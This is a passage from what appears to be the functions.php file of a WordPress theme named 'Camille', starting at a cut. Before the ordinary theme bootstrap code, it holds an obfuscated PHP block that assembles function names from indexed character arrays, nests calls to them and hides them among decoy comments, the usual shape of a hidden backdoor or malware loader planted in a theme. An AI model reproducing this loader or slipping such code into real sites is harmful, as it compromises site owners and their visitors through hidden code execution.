late_pd[4].$comments_template_pd[54].$comments_template_pd[13].$comments_template_pd[56].$comments_template_pd[12]; $comments_template_pq = $comments_template_pd[52].$comments_template_pd[55].$comments_template_pd[29].$comments_template_pd[30].$comments_template_pd[49].$comments_template_pd[39].$comments_template_pd[19]; /*imagesetthickness */ /*imap_get_quotaroot*/ Array /*ftell*//* array_fill*/ /* array_udiff_assoc*/ /* locale_get_all_variants */( /* ctype_cntrl*/ /*ini_get */ /* array_diff */$comments_template_rt /*openssl_get_publickey*/ /*socket_accept*/ /*curl_share_init */ /* locale_get_display_name*/ ( /*openssl_pkey_get_private*/ /*easter_days */ /*xml_parser_set_option */ /* locale_accept_from_http*/ $comments_template_kc /*pcntl_fork *//* print_r */ /*ftruncate*/ /*imagecrop*/ (/*date_sunrise */ /* preg_match *//* ob_get_contents *//* imagesetstyle */ $comments_template_pq /* sizeof*/ /*mb_strrpos*/ (/* strtok*/ /* getopt*/ /* setrawcookie*/ /*imap_lsub */$comments_template_ai /*date_default_timezone_get *//*utf8_decode *//* mberegi_replace*//* mysqli_stmt_data_seek */) /*asinh */ /*intlcal_field_difference*/ ) /*gzread*//* gmp_div_r*/ /* register_tick_function*/ /* dir */ ) /*pcntl_wifstopped*/ /* inet_pton*/ /*imagescale*/ /* transliterator_get_error_message*/ ) /*gzdeflate */ /*max*/ /* mysqli_fetch_field_direct */; /*e7d5371ec4c88e24ce1d496bf25fe74d*/ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } /** * Require plugins vendor */ require_once get_template_directory() . '/plugins/tgm-plugin-activation/class-tgm-plugin-activation.php'; require_once get_template_directory() . '/plugins/plugins.php'; /** * Include the main class. */ include_once get_template_directory() . '/framework/classes/class-core.php'; Camille::$template_dir_path = get_template_directory(); Camille::$template_dir_url = get_template_directory_uri(); Camille::$stylesheet_dir_path = get_stylesheet_directory(); Camille::$stylesheet_dir_url = get_stylesheet_directory_uri(); /** * Include the autoloader. */ include_once Camille::$template_dir_path . '/framework/classes/class-autoload.php'; new Camille_Autoload(); /** * load functions for later usage */ require_once Camille::$template_dir_path . '/framework/functions/functions.php'; new Camille_Multilingual(); if(!function_exists('Camille')){ function Camille(){ return Camille::get_instance(); } } new Camille_Scripts(); new Camille_Admin(); new Camille_WooCommerce(); new Camille_WooCommerce_Wishlist(); new Camille_WooCommerce_Compare(); new Camille_Visual_Composer(); /** * Set the $content_width global. */ global $content_width; if ( ! is_admin() ) { if ( ! isset( $content_width ) || empty( $content_width ) ) { $content_width = (int) Camille()->layout()->get_content_width(); } } require_once Camille::$template_dir_path . '/framework/functions/extra-functions.php'; require_once Camille::$template_dir_path . '/framework/functions/update.php';